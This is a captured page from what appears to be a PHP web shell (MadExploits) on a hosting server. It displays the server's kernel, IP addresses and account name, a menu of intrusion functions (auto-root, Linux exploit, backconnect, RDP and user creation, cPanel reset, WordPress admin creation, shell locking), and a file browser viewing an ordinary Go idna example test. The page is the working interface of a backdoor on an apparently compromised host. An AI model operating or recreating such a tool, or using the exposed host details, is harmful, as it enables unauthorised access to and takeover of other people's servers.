Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
golang.org /
x /
net@v0.20.0 /
idna /
[ HOME SHELL ]
Name
Size
Permission
Action
example_test.go
1.84
KB
-r--r--r--
go118.go
401
B
-r--r--r--
idna10.0.0.go
20.87
KB
-r--r--r--
idna9.0.0.go
19.18
KB
-r--r--r--
idna_test.go
2.66
KB
-r--r--r--
pre_go118.go
305
B
-r--r--r--
punycode.go
4.61
KB
-r--r--r--
punycode_test.go
5.78
KB
-r--r--r--
tables10.0.0.go
267.18
KB
-r--r--r--
tables11.0.0.go
270.55
KB
-r--r--r--
tables12.0.0.go
273.46
KB
-r--r--r--
tables13.0.0.go
284.27
KB
-r--r--r--
tables15.0.0.go
297.39
KB
-r--r--r--
tables9.0.0.go
263.4
KB
-r--r--r--
trie.go
1.26
KB
-r--r--r--
trie12.0.0.go
852
B
-r--r--r--
trie13.0.0.go
872
B
-r--r--r--
trieval.go
2.96
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : example_test.go
// Copyright 2017 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package idna_test import ( "fmt" "golang.org/x/net/idna" ) func ExampleProfile() { // Raw Punycode has no restrictions and does no mappings. fmt.Println(idna.ToASCII("")) fmt.Println(idna.ToASCII("*.GÖPHER.com")) fmt.Println(idna.Punycode.ToASCII("*.GÖPHER.com")) // Rewrite IDN for lookup. fmt.Println(idna.Lookup.ToASCII("")) fmt.Println(idna.Lookup.ToASCII("www.GÖPHER.com")) // Convert an IDN to ASCII for registration purposes. // This reports an error if the input was illformed. fmt.Println(idna.Registration.ToASCII("www.GÖPHER.com")) fmt.Println(idna.Registration.ToASCII("www.göpher.com")) // Output: // <nil> // *.xn--GPHER-1oa.com <nil> // *.xn--GPHER-1oa.com <nil> // <nil> // www.xn--gpher-jua.com <nil> // www.xn--GPHER-1oa.com idna: disallowed rune U+0047 // www.xn--gpher-jua.com <nil> } func ExampleNew() { var p *idna.Profile // Raw Punycode has no restrictions and does no mappings. p = idna.New() fmt.Println(p.ToASCII("*.faß.com")) // Do mappings. Note that star is not allowed in a DNS lookup. p = idna.New( idna.MapForLookup(), idna.Transitional(true)) // Map ß -> ss fmt.Println(p.ToASCII("*.faß.com")) // Lookup for registration. Also does not allow '*'. p = idna.New(idna.ValidateForRegistration()) fmt.Println(p.ToUnicode("*.faß.com")) // Set up a profile maps for lookup, but allows wild cards. p = idna.New( idna.MapForLookup(), idna.Transitional(true), // Map ß -> ss idna.StrictDomainName(false)) // Set more permissive ASCII rules. fmt.Println(p.ToASCII("*.faß.com")) // Output: // *.xn--fa-hia.com <nil> // *.fass.com idna: disallowed rune U+002A // *.faß.com idna: disallowed rune U+002A // *.fass.com <nil> }
Close